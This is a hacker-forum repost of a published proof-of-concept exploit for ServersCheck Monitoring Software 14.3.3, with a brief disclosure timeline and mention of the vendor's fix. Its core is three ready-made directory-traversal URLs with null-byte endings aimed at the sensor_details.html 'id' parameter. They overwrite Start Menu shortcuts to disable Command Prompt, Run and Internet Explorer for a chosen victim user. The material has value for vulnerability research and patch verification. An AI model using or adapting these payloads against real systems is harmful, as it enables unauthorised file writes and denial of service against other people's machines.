跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

ServersCheck Monitoring Software 14.3.3 - Arbitrary File Write

HACK1949
HACK1949
黑帽漏洞数据库

精选回复

发布于 
# Exploit Title: ServersCheck Monitoring Software 14.3.3 - Denial of Service (PoC)
# Author: John Page (aka hyp3rlinx)
# Date: 2018-10-23
# Vendor: www.serverscheck.com
# Software Link: http://downloads.serverscheck.com/monitoring_software/setup.exe
# CVE: N/A
# References: 
# http://hyp3rlinx.altervista.org/advisories/CVE-2018-18552-SERVERSCHECK-MONITORING-SOFTWARE-ARBITRARY-FILE-WRITE-DOS.txt
# https://serverscheck.com/monitoring-software/release.asp
# Affected Component: "sensor_details.html" webpage the "id" parameter

# Security Issue
# ServersCheck Monitoring Software allows remote attackers to cause a denial of service 
# (menu functionality loss) by creating an LNK file that points to a second LNK file, if this 
# second LNK file is associated with a Start menu item. Ultimately, this behavior comes 
# from a Directory Traversal bug (via the sensor_details.html id parameter) that allows 
# creating empty files in arbitrary directories. 

# Exploit/POC
# DOS Command Prompt .LNK under Start Menu change <VICTIM> to desired user.

http://127.0.0.1:1272/sensor_details.html?id=../../../../Users/<VICTIM>/AppData/Roaming/Microsoft/Windows/Start%20Menu/Programs/Accessories/Command%20Prompt.lnk%00

# DOS Run .LNK under Start Menu 

http://127.0.0.1:1272/sensor_details.html?id=../../../../Users/<VICTIM>/AppData/Roaming/Microsoft/Windows/Start%20Menu/Programs/Accessories/Run.lnk%00

# DOS Internet Explorer .LNK from Start Menu 
http://127.0.0.1:1272/sensor_details.html?id=../../../../Users/<VICTIM>/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Internet Explorer.LNK%00

# Victim will get error message from server like "Error retrieving sensor details from database".
# Then,No Internet Explorer, Command or Run prompt via the Start/Programs/Accessories/ 
# and Task Menu links. However, can still be launch by other means. Tested successfully on 
# Windows 7 OS

# [Disclosure Timeline]
# Vendor Notification: October 6, 2018
# Vendor acknowledgement: October 7, 2018
# Vendor release v14.3.4 : October 7th, 2018 
# CVE assign by Mitre: October 21, 2018
# October 22, 2018 : Public Disclosure

创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。